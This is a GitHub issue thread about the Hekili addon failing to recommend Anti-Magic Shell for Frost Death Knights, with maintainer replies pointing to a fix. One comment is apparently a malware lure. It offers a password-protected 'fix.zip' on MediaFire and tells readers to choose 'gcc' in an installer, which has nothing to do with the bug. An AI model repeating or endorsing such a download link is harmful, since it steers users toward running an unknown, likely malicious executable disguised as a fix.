### ISSUE TITLE
[REC] AMS Frost DK Not recommending in Rotation

### ISSUE THREAD

**Issue by Gjorns** [Hekili/hekili#3556]
### Before You Begin

- [X] I confirm that I have downloaded the latest version of the addon.
- [X] I am not playing on a private server.
- [X] I checked for an [existing, open ticket](https://github.com/Hekili/hekili/labels/recommendation) for this issue and was not able to find one.
- [X] I edited the title of this issue (above) so that it describes the issue I am reporting.
- [X] I am reporting an issue with the default priority included with the specialization (imported or edited priorities are not supported).

### Describe the Issue

Noticed that there is an option for Frost DK's "Anti-Magic Shell Requirements" - No matter what is chosen, it is not recommending AMS into rotation.

### How to Reproduce

1. Enter game as Frost DK
2. Change hekili settings Regarding AMS
3. Go to Dummy

### Snapshot (Link)

https://pastebin.com/kFU6Wmt2

### Contact Information

Gjornsy

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gjorns** [comment]
new paste: https://pastebin.com/t96KeE4B

**Comment by syrifgit** [comment]
This is addressed in https://github.com/Hekili/hekili/pull/3548

**Comment by Hekili** [comment]
Will be addressed in 1.0.5.
